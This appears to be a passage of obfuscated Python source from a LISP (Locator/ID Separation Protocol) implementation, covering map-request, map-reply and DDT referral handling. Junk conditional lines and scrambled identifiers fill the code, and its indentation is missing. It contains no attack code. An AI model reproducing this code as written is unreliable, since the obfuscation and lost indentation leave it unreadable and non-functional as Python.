if 44 - 44: OoooooooOO + I1Ii111 + OoO0O00
if 15 - 15: iIii1I11I1II1 % i1IIi + iII111i
if 48 - 48: o0oOOo0O0Ooo / oO0o
if ( I1i1III1I1 != 0 ) :
for I1I in OooOo0OO . delegation_set :
oOOo = lisp_rloc_record ( )
oOOo . rloc = I1I . delegate_address
oOOo . priority = I1I . priority
oOOo . weight = I1I . weight
oOOo . mpriority = 255
oOOo . mweight = 0
oOOo . reach_bit = True
IiiiIi1iiii11 += oOOo . encode ( )
oOOo . print_record ( " " )
if 61 - 61: I1IiiI + iII111i * Ii1I % I1Ii111 . Ii1I
if 83 - 83: i11iIiiIii * OoOoOO00 * i11iIiiIii % II111iiii . i11iIiiIii * I11i
if 67 - 67: i1IIi / i1IIi + IiII . oO0o
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IiiiIi1iiii11 , ecm_source , port )
return
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
if 10 - 10: I1IiiI / i1IIi * o0oOOo0O0Ooo + Oo0Ooo - OoOoOO00 % iII111i
if 88 - 88: Ii1I % Ii1I
if 29 - 29: OOooOOo % I1ii11iIi11i
if 57 - 57: I1ii11iIi11i - OoOoOO00 + IiII
if 58 - 58: OOooOOo % I1IiiI / oO0o . ooOoO0o . OoO0O00 / IiII
if 72 - 72: ooOoO0o + ooOoO0o + o0oOOo0O0Ooo - o0oOOo0O0Ooo % Ii1I
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 52 - 52: I11i % i1IIi . I1ii11iIi11i
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# oO0o / I1ii11iIi11i * O0 % I11i
red ( dest . print_address ( ) , False ) ) )
if 34 - 34: oO0o / O0 * oO0o
iI1IIi1I = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
if 60 - 60: I1IiiI / I1IiiI / II111iiii
if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
if ( lisp_get_eid_hash ( eid ) != None ) :
iI1IIi1I = LISP_SEND_MAP_REQUEST_ACTION
if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
IiiiIi1iiii11 = lisp_build_map_reply ( eid , group , [ ] , nonce , iI1IIi1I , ttl , None ,
None , False , False )
if 34 - 34: I1Ii111 / i1IIi
if 95 - 95: OoOoOO00 * OOooOOo
if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
if 77 - 77: i11iIiiIii + i11iIiiIii - I1ii11iIi11i % I1ii11iIi11i
if ( pubsub ) :
lisp_process_pubsub ( sockets , IiiiIi1iiii11 , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , IiiiIi1iiii11 , dest , port )
if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
return
if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
if 40 - 40: oO0o * OOooOOo + Ii1I + I11i * Ii1I + OoooooooOO
if 77 - 77: OOooOOo + ooOoO0o / O0
if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
if 49 - 49: ooOoO0o . Ii1I
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
def lisp_retransmit_ddt_map_request ( mr ) :
I1IIiiiI1I1iiIii = mr . mr_source . print_address ( )
O0i1111ii1 = mr . print_eid_tuple ( )
o0OOO = mr . nonce
if 11 - 11: Ii1I - IiII
if 20 - 20: I11i % oO0o * Oo0Ooo - I1Ii111 . Ii1I * I1ii11iIi11i
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if 13 - 13: iII111i % i1IIi
if ( mr . last_request_sent_to ) :
I1Ii = mr . last_request_sent_to . print_address ( )
IiII111IiII1 = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( IiII111IiII1 and IiII111IiII1 . referral_set . has_key ( I1Ii ) ) :
IiII111IiII1 . referral_set [ I1Ii ] . no_responses += 1
if 36 - 36: OoO0O00 . Oo0Ooo * I1ii11iIi11i
if 16 - 16: IiII + OOooOOo
if 33 - 33: ooOoO0o . i11iIiiIii + OOooOOo
if 77 - 77: OoooooooOO * Ii1I * iIii1I11I1II1 + IiII
if 53 - 53: IiII + I1Ii111 + oO0o
if 31 - 31: OOooOOo + OoOoOO00 * OOooOOo + OoOoOO00 / o0oOOo0O0Ooo . iIii1I11I1II1
if 1 - 1: I1Ii111 * i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / Oo0Ooo
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( O0i1111ii1 , False ) , lisp_hex_string ( o0OOO ) ) )
if 3 - 3: OOooOOo - i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
mr . dequeue_map_request ( )
return
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
mr . retry_count += 1
if 41 - 41: I1ii11iIi11i * IiII
OO0o0OO0 = green ( I1IIiiiI1I1iiIii , False )
o0 = green ( O0i1111ii1 , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# IiII
red ( mr . itr . print_address ( ) , False ) , OO0o0OO0 , o0 ,
lisp_hex_string ( o0OOO ) ) )
if 70 - 70: iIii1I11I1II1 / I1IiiI * OoOoOO00 / IiII / II111iiii + I1IiiI
if 33 - 33: oO0o
if 1 - 1: OoOoOO00 . i11iIiiIii % I1Ii111 + OoooooooOO - Oo0Ooo . I1ii11iIi11i
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
lisp_send_ddt_map_request ( mr , False )
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
if 85 - 85: iII111i % i11iIiiIii
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 99 - 99: i1IIi * OoOoOO00 - i1IIi
if 65 - 65: OoO0O00 / i11iIiiIii + I1ii11iIi11i + OoOoOO00
if 82 - 82: Ii1I * OOooOOo % ooOoO0o / OoO0O00 - Oo0Ooo . I1Ii111
if 90 - 90: I11i * i11iIiiIii % i1IIi + I1Ii111 / OoO0O00
IIiI11 = [ ]
for iiI111I in referral . referral_set . values ( ) :
if ( iiI111I . updown == False ) : continue
if ( len ( IIiI11 ) == 0 or IIiI11 [ 0 ] . priority == iiI111I . priority ) :
IIiI11 . append ( iiI111I )
elif ( IIiI11 [ 0 ] . priority > iiI111I . priority ) :
IIiI11 = [ ]
IIiI11 . append ( iiI111I )
if 28 - 28: I11i - iII111i - OOooOOo - ooOoO0o
if 68 - 68: I11i + Ii1I
if 70 - 70: I11i + oO0o + o0oOOo0O0Ooo . I1Ii111 * i11iIiiIii
Ii = len ( IIiI11 )
if ( Ii == 0 ) : return ( None )
if 19 - 19: oO0o
I1iI1111ii1I1 = dest_eid . hash_address ( source_eid )
I1iI1111ii1I1 = I1iI1111ii1I1 % Ii
return ( IIiI11 [ I1iI1111ii1I1 ] )
if 45 - 45: iIii1I11I1II1
if 11 - 11: OoO0O00 / I1Ii111 . OoOoOO00
if 95 - 95: I1ii11iIi11i / Ii1I % ooOoO0o . OoooooooOO % OoOoOO00 . OoOoOO00
if 1 - 1: I1ii11iIi11i % o0oOOo0O0Ooo % i11iIiiIii - OOooOOo - ooOoO0o - OoO0O00
if 94 - 94: OoO0O00 . Oo0Ooo / OoO0O00 + I1Ii111
if 48 - 48: I1ii11iIi11i * i1IIi + I1Ii111
if 80 - 80: I1IiiI % I11i
def lisp_send_ddt_map_request ( mr , send_to_root ) :
OOOooo0 = mr . lisp_sockets
o0OOO = mr . nonce
OooO0OO0 = mr . itr
OOoOooOoOo = mr . mr_source
Ii1i1 = mr . print_eid_tuple ( )
if 36 - 36: o0oOOo0O0Ooo . I1Ii111 . i11iIiiIii
if 29 - 29: I11i % I1IiiI * i1IIi
if 41 - 41: OOooOOo
if 43 - 43: I1IiiI . Oo0Ooo + i1IIi + I11i / OoO0O00
if 66 - 66: i11iIiiIii
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( Ii1i1 , False ) , lisp_hex_string ( o0OOO ) ) )
if 83 - 83: I1Ii111 / iIii1I11I1II1 - oO0o
mr . dequeue_map_request ( )
return
if 3 - 3: OOooOOo - Oo0Ooo * I1IiiI - OoO0O00 / OOooOOo + IiII
if 83 - 83: i1IIi * i1IIi - II111iiii / OoooooooOO . Ii1I + I1Ii111
if 10 - 10: I11i
if 24 - 24: Ii1I
if 30 - 30: II111iiii / Ii1I - I11i - OoO0O00
if 25 - 25: I11i % i1IIi / I11i * i11iIiiIii
if ( send_to_root ) :
O0O0Oooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
o0oOoO00 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( Ii1i1 , False ) ) )
else :
O0O0Oooo0O = mr . eid
o0oOoO00 = mr . group
if 97 - 97: iIii1I11I1II1 * i1IIi * II111iiii - OOooOOo - Oo0Ooo - iIii1I11I1II1
if 26 - 26: ooOoO0o + Oo0Ooo
if 24 - 24: I1IiiI
if 43 - 43: OoO0O00
if 51 - 51: OoooooooOO % IiII % Oo0Ooo
IiiiiII1i = lisp_referral_cache_lookup ( O0O0Oooo0O , o0oOoO00 , False )
if ( IiiiiII1i == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( OOOooo0 , O0O0Oooo0O , o0oOoO00 ,
o0OOO , OooO0OO0 , mr . sport , 15 , None , False )
return
if 91 - 91: I1IiiI . I1Ii111 + II111iiii . Oo0Ooo
if 95 - 95: iII111i
oo0oooo00OOO = IiiiiII1i . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( oo0oooo00OOO ,
IiiiiII1i . print_referral_type ( ) ) )
if 80 - 80: ooOoO0o / OOooOOo / Ii1I * i1IIi . I11i
iiI111I = lisp_get_referral_node ( IiiiiII1i , OOoOooOoOo , mr . eid )
if ( iiI111I == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( OOOooo0 , IiiiiII1i . eid ,
IiiiiII1i . group , o0OOO , OooO0OO0 , mr . sport , 1 , None , False )
return
if 47 - 47: I1ii11iIi11i
if 49 - 49: OoooooooOO . OoooooooOO - i1IIi
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( iiI111I . referral_address . print_address ( ) ,
# OoooooooOO / iII111i * OOooOOo
IiiiiII1i . print_referral_type ( ) , green ( Ii1i1 , False ) ,
lisp_hex_string ( o0OOO ) ) )
if 1 - 1: OOooOOo / II111iiii / II111iiii % OoO0O00 % iIii1I11I1II1
if 36 - 36: I1IiiI / O0
if 20 - 20: OoooooooOO + o0oOOo0O0Ooo . IiII * O0 + i11iIiiIii
if 67 - 67: ooOoO0o . Oo0Ooo
iIOo000OOo = ( IiiiiII1i . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
IiiiiII1i . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( OOOooo0 , mr . packet , OOoOooOoOo , mr . sport , mr . eid ,
iiI111I . referral_address , to_ms = iIOo000OOo , ddt = True )
if 19 - 19: OoooooooOO % oO0o
if 49 - 49: i1IIi % OoooooooOO + OoooooooOO / OoO0O00 + OoO0O00 * II111iiii
if 89 - 89: o0oOOo0O0Ooo - oO0o . II111iiii
if 39 - 39: OoOoOO00 - OOooOOo / II111iiii * OoooooooOO - OoO0O00 . I1IiiI
mr . last_request_sent_to = iiI111I . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
iiI111I . map_requests_sent += 1
return
if 89 - 89: IiII
if 73 - 73: II111iiii + ooOoO0o % OOooOOo . oO0o / oO0o * i1IIi
if 19 - 19: I1Ii111 + I11i
if 21 - 21: OoOoOO00
if 2 - 2: i1IIi . OOooOOo
if 23 - 23: Ii1I - OOooOOo
if 89 - 89: i11iIiiIii
if 40 - 40: OoooooooOO % OoO0O00
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 54 - 54: i1IIi * OOooOOo - oO0o * OoooooooOO + II111iiii . IiII
iiI1I1IIi = map_request . target_eid
OOo0oOOO0 = map_request . target_group
O0i1111ii1 = map_request . print_eid_tuple ( )
I1IIiiiI1I1iiIii = mr_source . print_address ( )
o0OOO = map_request . nonce
if 90 - 90: O0 - II111iiii + I1IiiI . iII111i
OO0o0OO0 = green ( I1IIiiiI1I1iiIii , False )
o0 = green ( O0i1111ii1 , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# Oo0Ooo
red ( ecm_source . print_address ( ) , False ) , OO0o0OO0 , o0 ,
lisp_hex_string ( o0OOO ) ) )
if 43 - 43: i1IIi * O0 + ooOoO0o + OoO0O00
if 99 - 99: IiII . OoOoOO00
if 64 - 64: I1Ii111
if 96 - 96: Ii1I
oOO00O0oooo00 = lisp_ddt_map_request ( lisp_sockets , packet , iiI1I1IIi , OOo0oOOO0 , o0OOO )
oOO00O0oooo00 . packet = packet
oOO00O0oooo00 . itr = ecm_source
oOO00O0oooo00 . mr_source = mr_source
oOO00O0oooo00 . sport = sport
oOO00O0oooo00 . from_pitr = map_request . pitr_bit
oOO00O0oooo00 . queue_map_request ( )
if 90 - 90: Oo0Ooo - IiII % O0
lisp_send_ddt_map_request ( oOO00O0oooo00 , False )
return
if 57 - 57: OoooooooOO - o0oOOo0O0Ooo * Oo0Ooo + ooOoO0o
if 22 - 22: I1ii11iIi11i % I1Ii111 % i11iIiiIii . ooOoO0o
if 48 - 48: ooOoO0o - O0
if 29 - 29: oO0o . oO0o
if 96 - 96: O0
if 85 - 85: Oo0Ooo + i11iIiiIii . OOooOOo / II111iiii / iII111i
if 90 - 90: o0oOOo0O0Ooo - OoooooooOO - i1IIi
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl , timestamp ) :
if 47 - 47: I1Ii111 * Ii1I . iIii1I11I1II1 / OoOoOO00
oO0ooOoOooO00o00 = packet
Ooo00 = lisp_map_request ( )
packet = Ooo00 . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 56 - 56: OoOoOO00 * II111iiii * o0oOOo0O0Ooo - I1IiiI + OoOoOO00 - O0
if 48 - 48: OoooooooOO % Ii1I * OoO0O00 / I1ii11iIi11i
Ooo00 . print_map_request ( )
if 53 - 53: ooOoO0o + oO0o - II111iiii
if 92 - 92: Oo0Ooo - I11i . ooOoO0o % oO0o
if 6 - 6: iIii1I11I1II1 + oO0o
if 8 - 8: I1ii11iIi11i + o0oOOo0O0Ooo
if ( Ooo00 . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , Ooo00 , mr_source ,
mr_port , ttl , timestamp )
return
if 29 - 29: Ii1I . OOooOOo
if 59 - 59: O0 . OoO0O00
if 10 - 10: I1Ii111 / OoooooooOO / OoO0O00 * ooOoO0o
if 81 - 81: i1IIi % I11i * iIii1I11I1II1
if 39 - 39: iIii1I11I1II1 / O0 . OoooooooOO - O0 . OoO0O00 . oO0o
if ( Ooo00 . smr_bit ) :
lisp_process_smr ( Ooo00 )
if 59 - 59: II111iiii * I1IiiI
if 12 - 12: i11iIiiIii - IiII . iII111i . Ii1I
if 34 - 34: i1IIi % iII111i + Oo0Ooo * OoOoOO00 + OoO0O00
if 37 - 37: I1Ii111 / OoooooooOO
if 19 - 19: Ii1I - O0 + I1IiiI + OoooooooOO + ooOoO0o - Oo0Ooo
if ( Ooo00 . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( Ooo00 )
if 45 - 45: I1IiiI . OoOoOO00 . OoOoOO00
if 20 - 20: OoOoOO00
if 69 - 69: OoOoOO00 * Ii1I % ooOoO0o . OoOoOO00 / oO0o * I1Ii111
if 93 - 93: OoO0O00 % IiII % ooOoO0o . I1IiiI
if 96 - 96: II111iiii
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , Ooo00 , mr_source ,
mr_port , ttl , timestamp )
if 73 - 73: II111iiii
if 81 - 81: I1IiiI + OoO0O00
if 22 - 22: OoO0O00 * OoOoOO00 * I11i * IiII . OoO0O00 . I1ii11iIi11i
if 32 - 32: o0oOOo0O0Ooo - iII111i + i11iIiiIii / ooOoO0o . OoOoOO00 . IiII
if 9 - 9: iIii1I11I1II1
if ( lisp_i_am_ms ) :
packet = oO0ooOoOooO00o00
iiI1I1IIi , OOo0oOOO0 , oooiIIIiiiII1iiI = lisp_ms_process_map_request ( lisp_sockets ,
oO0ooOoOooO00o00 , Ooo00 , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , Ooo00 , ecm_source ,
ecm_port , oooiIIIiiiII1iiI , iiI1I1IIi , OOo0oOOO0 )
if 67 - 67: I1Ii111 * iIii1I11I1II1 / O0 + OoO0O00 * iIii1I11I1II1 % II111iiii
return
if 13 - 13: Ii1I / ooOoO0o / iII111i % II111iiii * I1IiiI * II111iiii
if 40 - 40: Ii1I / i1IIi . iII111i
if 65 - 65: iIii1I11I1II1 * O0 . II111iiii * o0oOOo0O0Ooo . I1ii11iIi11i * I1IiiI
if 63 - 63: II111iiii . Oo0Ooo % iIii1I11I1II1
if 85 - 85: I1IiiI + i1IIi % I1Ii111
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , oO0ooOoOooO00o00 , Ooo00 ,
ecm_source , mr_port , mr_source )
if 76 - 76: i11iIiiIii % i11iIiiIii
if 33 - 33: OOooOOo . ooOoO0o / iIii1I11I1II1 * OOooOOo / oO0o
if 75 - 75: Ii1I - OoOoOO00 . OOooOOo - o0oOOo0O0Ooo - I1ii11iIi11i
if 69 - 69: O0 % I1ii11iIi11i
if 77 - 77: iIii1I11I1II1 . OOooOOo
if ( lisp_i_am_ddt or ddt_request ) :
packet = oO0ooOoOooO00o00
lisp_ddt_process_map_request ( lisp_sockets , Ooo00 , ecm_source ,
ecm_port )
if 64 - 64: OoOoOO00 - i1IIi * i1IIi / iII111i * OoOoOO00 * OoO0O00
return
if 61 - 61: OOooOOo
if 51 - 51: Oo0Ooo * OOooOOo / iII111i
if 49 - 49: ooOoO0o . i1IIi % I1Ii111 . I1IiiI . I1ii11iIi11i + OoO0O00
if 65 - 65: I1ii11iIi11i + Ii1I / i11iIiiIii * I1Ii111 + OoooooooOO
if 7 - 7: Oo0Ooo % o0oOOo0O0Ooo
if 40 - 40: oO0o * IiII
if 29 - 29: O0 - II111iiii + iII111i
if 73 - 73: I1Ii111 - I11i + IiII - o0oOOo0O0Ooo - I11i - OOooOOo
def lisp_store_mr_stats ( source , nonce ) :
oOO00O0oooo00 = lisp_get_map_resolver ( source , None )
if ( oOO00O0oooo00 == None ) : return
if 40 - 40: iIii1I11I1II1 . iII111i * I1ii11iIi11i + IiII - iIii1I11I1II1
if 83 - 83: i1IIi
if 9 - 9: iIii1I11I1II1 + i11iIiiIii
if 70 - 70: I1IiiI - OoO0O00 % OOooOOo + ooOoO0o % II111iiii
oOO00O0oooo00 . neg_map_replies_received += 1
oOO00O0oooo00 . last_reply = lisp_get_timestamp ( )
if 19 - 19: I11i + i1IIi / i1IIi - II111iiii + I1Ii111
if 11 - 11: i11iIiiIii % i11iIiiIii / IiII - Oo0Ooo / O0 - I11i
if 29 - 29: OOooOOo * iIii1I11I1II1 * ooOoO0o
if 80 - 80: oO0o * I1Ii111
if ( ( oOO00O0oooo00 . neg_map_replies_received % 100 ) == 0 ) : oOO00O0oooo00 . total_rtt = 0
if 87 - 87: iII111i + OoOoOO00 % ooOoO0o - oO0o
if 40 - 40: i1IIi / OoOoOO00 - I11i / ooOoO0o . Ii1I
if 8 - 8: I1IiiI . IiII . OOooOOo . O0
if 3 - 3: Ii1I + i11iIiiIii
if ( oOO00O0oooo00 . last_nonce == nonce ) :
oOO00O0oooo00 . total_rtt += ( time . time ( ) - oOO00O0oooo00 . last_used )
oOO00O0oooo00 . last_nonce = 0
if 87 - 87: ooOoO0o - iII111i % I11i
if ( ( oOO00O0oooo00 . neg_map_replies_received % 10 ) == 0 ) : oOO00O0oooo00 . last_nonce = 0
return
if 88 - 88: I11i . OoooooooOO
if 86 - 86: Ii1I - I1IiiI - iII111i % Ii1I . I1ii11iIi11i % i1IIi
if 84 - 84: OoOoOO00
if 99 - 99: OoO0O00 - OoOoOO00 - i1IIi / OoO0O00 * I1ii11iIi11i * iIii1I11I1II1
if 65 - 65: iII111i - O0 / i1IIi . I1Ii111
if 85 - 85: o0oOOo0O0Ooo % Ii1I
if 81 - 81: oO0o / OoO0O00 * i1IIi % iIii1I11I1II1
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl , itr_in_ts ) :
global lisp_map_cache
if 23 - 23: II111iiii . II111iiii
iI1I1ii = lisp_map_reply ( )
packet = iI1I1ii . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 17 - 17: i11iIiiIii / IiII * I1IiiI . Oo0Ooo / o0oOOo0O0Ooo - iIii1I11I1II1
iI1I1ii . print_map_reply ( )
if 21 - 21: OOooOOo % Ii1I
if 3 - 3: OOooOOo / ooOoO0o / I1Ii111 . I11i
if 54 - 54: I1ii11iIi11i - I1IiiI . OoOoOO00
if 36 - 36: OoO0O00 * I1IiiI / iII111i
o0ii11i1iI1111 = None
for iIi1I1 in range ( iI1I1ii . record_count ) :
oO000oOoO0 = lisp_eid_record ( )
packet = oO000oOoO0 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 99 - 99: i1IIi + OoOoOO00 - iII111i % II111iiii
oO000oOoO0 . print_record ( " " , False )
if 6 - 6: ooOoO0o - I1Ii111 . OoOoOO00
if 64 - 64: iII111i + I1ii11iIi11i
if 88 - 88: I1Ii111 / i11iIiiIii - O0 . II111iiii / II111iiii * II111iiii
if 56 - 56: Oo0Ooo / I1IiiI % I1Ii111 % I1ii11iIi11i * I1IiiI - IiII
if 39 - 39: oO0o + iII111i . I1Ii111 * i11iIiiIii % o0oOOo0O0Ooo + OOooOOo
if ( oO000oOoO0 . rloc_count == 0 ) :
lisp_store_mr_stats ( source , iI1I1ii . nonce )
if 61 - 61: ooOoO0o / I1Ii111 / I1ii11iIi11i - Ii1I % o0oOOo0O0Ooo * iII111i
if 94 - 94: I1IiiI / I11i
I1Ii11iI = ( oO000oOoO0 . group . is_null ( ) == False )
if 100 - 100: Ii1I % OoO0O00 % OoooooooOO / II111iiii * I1Ii111
if 64 - 64: I1Ii111 * OOooOOo * Ii1I + I1ii11iIi11i / iIii1I11I1II1 / Oo0Ooo
if 50 - 50: OOooOOo % i11iIiiIii
if 99 - 99: IiII
if 87 - 87: IiII
if ( lisp_decent_push_configured ) :
iI1IIi1I = oO000oOoO0 . action
if ( I1Ii11iI and iI1IIi1I == LISP_DROP_ACTION ) :
if ( oO000oOoO0 . eid . is_local ( ) ) : continue
if 35 - 35: oO0o . O0 . Ii1I / ooOoO0o
if 36 - 36: i11iIiiIii . II111iiii . I11i . II111iiii
if 36 - 36: Ii1I + ooOoO0o / Oo0Ooo % Oo0Ooo
if 2 - 2: oO0o - Oo0Ooo * OoO0O00 . ooOoO0o . OOooOOo - oO0o
if 74 - 74: o0oOOo0O0Ooo
if 18 - 18: Oo0Ooo % OOooOOo / OOooOOo . I1IiiI + i1IIi . I1IiiI
if 3 - 3: O0 * O0 + II111iiii + OoOoOO00 * I11i % Oo0Ooo
if ( I1Ii11iI == False and oO000oOoO0 . eid . is_null ( ) ) : continue
if 19 - 19: oO0o % IiII % OoooooooOO % I1ii11iIi11i / OoO0O00
if 6 - 6: O0 * I1Ii111 - II111iiii
if 60 - 60: oO0o % oO0o
if 76 - 76: I1Ii111 / o0oOOo0O0Ooo
if 19 - 19: O0 . i1IIi % iIii1I11I1II1 + OOooOOo * OoOoOO00 / I11i
if ( I1Ii11iI ) :
o0oO0o00 = lisp_map_cache_lookup ( oO000oOoO0 . eid , oO000oOoO0 . group )
else :
o0oO0o00 = lisp_map_cache . lookup_cache ( oO000oOoO0 . eid , True )
if 91 - 91: IiII / I1IiiI - Ii1I + o0oOOo0O0Ooo
oOOo00Oo00OO0 = ( o0oO0o00 == None )
if 48 - 48: OoOoOO00 * o0oOOo0O0Ooo / II111iiii / iIii1I11I1II1 . O0
if 54 - 54: iIii1I11I1II1
if 54 - 54: iII111i + OOooOOo + OoO0O00
if 6 - 6: oO0o - OoooooooOO * iIii1I11I1II1 * I1ii11iIi11i
if 65 - 65: IiII + OoOoOO00
if ( o0oO0o00 == None ) :
oO0ooO0O000 , oOo0oo , IIIi1i1iIIIi = lisp_allow_gleaning ( oO000oOoO0 . eid , oO000oOoO0 . group ,
None )
if ( oO0ooO0O000 ) : continue
else :
if ( o0oO0o00 . gleaned ) : continue
if 66 - 66: i11iIiiIii + II111iiii / ooOoO0o + ooOoO0o * II111iiii
if 36 - 36: I1Ii111 * ooOoO0o . ooOoO0o
if 75 - 75: ooOoO0o + II111iiii / Ii1I - IiII % I1IiiI
if 82 - 82: Oo0Ooo
if 63 - 63: II111iiii * II111iiii % I1IiiI
OoO0oOOooOO = [ ]
I111i11 = None
for oO00000o0OO0 in range ( oO000oOoO0 . rloc_count ) :
oOOo = lisp_rloc_record ( )
oOOo . keys = iI1I1ii . keys
packet = oOOo . decode ( packet , iI1I1ii . nonce )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Reply packet" )
return
if 78 - 78: OOooOOo - OoOoOO00 * I1Ii111
oOOo . print_record ( " " )
if 56 - 56: IiII * oO0o % OoO0O00 + I1Ii111 / o0oOOo0O0Ooo % Ii1I
iiII111i1i = None
if ( o0oO0o00 ) : iiII111i1i = o0oO0o00 . get_rloc ( oOOo . rloc )
if ( iiII111i1i ) :
I1II = iiII111i1i
else :
I1II = lisp_rloc ( )
if 97 - 97: iIii1I11I1II1 + OoOoOO00 + OoOoOO00 * o0oOOo0O0Ooo
if 14 - 14: II111iiii + I1ii11iIi11i * Oo0Ooo
if 95 - 95: IiII + iII111i % I1IiiI
if 18 - 18: Oo0Ooo
if 8 - 8: O0 + iIii1I11I1II1 - O0
if 67 - 67: O0
if 22 - 22: I11i / i1IIi . II111iiii % ooOoO0o / I11i - Ii1I
Oo0o = I1II . store_rloc_from_record ( oOOo , iI1I1ii . nonce ,
source )
I1II . echo_nonce_capable = iI1I1ii . echo_nonce_capable
if 28 - 28: O0 - Oo0Ooo
if ( I1II . echo_nonce_capable ) :
oo0o00OO = I1II . rloc . print_address_no_iid ( )
if ( lisp_get_echo_nonce ( None , oo0o00OO ) == None ) :
lisp_echo_nonce ( oo0o00OO )
if 58 - 58: iIii1I11I1II1 - OoooooooOO - iII111i
if 43 - 43: ooOoO0o / o0oOOo0O0Ooo
if 56 - 56: II111iiii * I1ii11iIi11i * O0 . iII111i . I1ii11iIi11i % I1Ii111
